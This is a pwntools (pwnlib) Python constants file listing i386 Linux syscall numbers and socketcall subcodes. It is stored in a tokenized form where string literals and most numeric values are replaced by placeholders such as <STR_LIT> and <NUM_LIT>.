<s> from pwnlib . constants . constant import Constant <EOL> __NR_exit = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> __NR_fork = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> __NR_read = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> __NR_write = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> __NR_open = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> __NR_close = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> __NR_waitpid = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> __NR_creat = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> __NR_link = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> __NR_unlink = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> __NR_execve = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> __NR_chdir = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> __NR_time = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mknod = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_chmod = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> __NR_lchown = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> __NR_break = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_oldstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lseek = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getpid = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> __NR_mount = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_umount = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_stime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ptrace = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_alarm = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_oldfstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pause = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_utime = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> __NR_stty = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_gtty = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> __NR_access = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_nice = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ftime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_kill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rename = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mkdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rmdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_dup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pipe = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_times = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_prof = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_brk = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_signal = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_geteuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getegid = Constant ( '<STR_LIT>' , <NUM_LIT:50> ) <EOL> __NR_acct = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_umount2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ioctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fcntl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mpx = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setpgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ulimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_oldolduname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_umask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_chroot = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ustat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_dup2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getppid = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> __NR_getpgrp = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setsid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigaction = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sgetmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ssetmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setreuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setregid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigsuspend = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigpending = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sethostname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getrusage = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_gettimeofday = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_settimeofday = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getgroups = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setgroups = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_select = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_symlink = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_oldlstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_readlink = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_uselib = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_swapon = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_reboot = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_readdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mmap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_munmap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_truncate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ftruncate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchmod = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchown = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getpriority = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setpriority = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_profil = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_statfs = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fstatfs = Constant ( '<STR_LIT>' , <NUM_LIT:100> ) <EOL> __NR_ioperm = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_socketcall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_syslog = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setitimer = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getitimer = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_stat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_olduname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_iopl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vhangup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_idle = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vm86old = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_wait4 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_swapoff = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sysinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ipc = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fsync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigreturn = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_clone = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setdomainname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_uname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_modify_ldt = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_adjtimex = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mprotect = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigprocmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_create_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_init_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_delete_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_get_kernel_syms = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_quotactl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getpgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_bdflush = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sysfs = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_personality = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_afs_syscall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setfsuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setfsgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR__llseek = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getdents = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR__newselect = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_flock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_msync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_readv = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_writev = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getsid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fdatasync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR__sysctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mlock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_munlock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mlockall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_munlockall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_setparam = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_getparam = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_setscheduler = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_getscheduler = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_yield = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_get_priority_max = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_get_priority_min = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_rr_get_interval = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_nanosleep = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mremap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setresuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getresuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vm86 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_query_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_poll = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_nfsservctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setresgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getresgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_prctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigreturn = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigaction = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigprocmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigpending = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigtimedwait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigqueueinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigsuspend = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pread = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pwrite = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_chown = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getcwd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_capget = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_capset = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigaltstack = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sendfile = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getpmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_putpmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vfork = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ugetrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mmap2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_truncate64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ftruncate64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_stat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lstat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fstat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lchown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getgid32 = Constant ( '<STR_LIT>' , <NUM_LIT:200> ) <EOL> __NR_geteuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getegid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setreuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setregid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getgroups32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setgroups32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setresuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getresuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setresgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getresgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_chown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setfsuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setfsgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pivot_root = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mincore = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_madvise = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_madvise1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getdents64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fcntl64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_gettid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_readahead = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lsetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fsetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lgetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fgetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_listxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_llistxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_flistxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_removexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lremovexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fremovexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_tkill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sendfile64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_futex = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_setaffinity = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_getaffinity = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_set_thread_area = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_get_thread_area = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_io_setup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_io_destroy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_io_getevents = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_io_submit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_io_cancel = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fadvise64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_exit_group = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lookup_dcookie = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_epoll_create = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_epoll_ctl = Constant ( '<STR_LIT>' , <NUM_LIT:255> ) <EOL> __NR_epoll_wait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_remap_file_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_set_tid_address = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_timer_create = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_timer_settime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> __NR_timer_gettime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:2> ) ) <EOL> __NR_timer_getoverrun = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:3> ) ) <EOL> __NR_timer_delete = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:4> ) ) <EOL> __NR_clock_settime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:5> ) ) <EOL> __NR_clock_gettime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:6> ) ) <EOL> __NR_clock_getres = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:7> ) ) <EOL> __NR_clock_nanosleep = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:8> ) ) <EOL> __NR_statfs64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fstatfs64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_tgkill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_utimes = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fadvise64_64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vserver = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mbind = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_get_mempolicy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_set_mempolicy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mq_open = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mq_unlink = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> __NR_mq_timedsend = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:2> ) ) <EOL> __NR_mq_timedreceive = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:3> ) ) <EOL> __NR_mq_notify = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:4> ) ) <EOL> __NR_mq_getsetattr = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:5> ) ) <EOL> __NR_sys_kexec_load = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_waitid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_add_key = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_request_key = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_keyctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ioprio_set = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ioprio_get = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_inotify_init = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_inotify_add_watch = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_inotify_rm_watch = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_migrate_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_openat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mkdirat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mknodat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchownat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_futimesat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fstatat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_unlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_renameat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_linkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_symlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_readlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchmodat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_faccessat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pselect6 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ppoll = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_unshare = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_set_robust_list = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_get_robust_list = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_splice = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sync_file_range = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_tee = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vmsplice = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_move_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getcpu = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_epoll_pwait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_utimensat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_signalfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_timerfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_eventfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fallocate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_timerfd_settime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_timerfd_gettime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_signalfd4 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_eventfd2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_epoll_create1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_dup3 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pipe2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_inotify_init1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_preadv = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pwritev = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_tgsigqueueinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_perf_event_open = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_recvmmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fanotify_init = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fanotify_mark = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_prlimit64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_SOCKET = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SYS_BIND = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SYS_CONNECT = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> SYS_LISTEN = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SYS_ACCEPT = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SYS_GETSOCKNAME = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SYS_GETPEERNAME = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> SYS_SOCKETPAIR = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> SYS_SEND = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> SYS_RECV = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> SYS_SENDTO = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> SYS_RECVFROM = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> SYS_SHUTDOWN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_SETSOCKOPT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_GETSOCKOPT = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> SYS_SENDMSG = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> SYS_RECVMSG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> 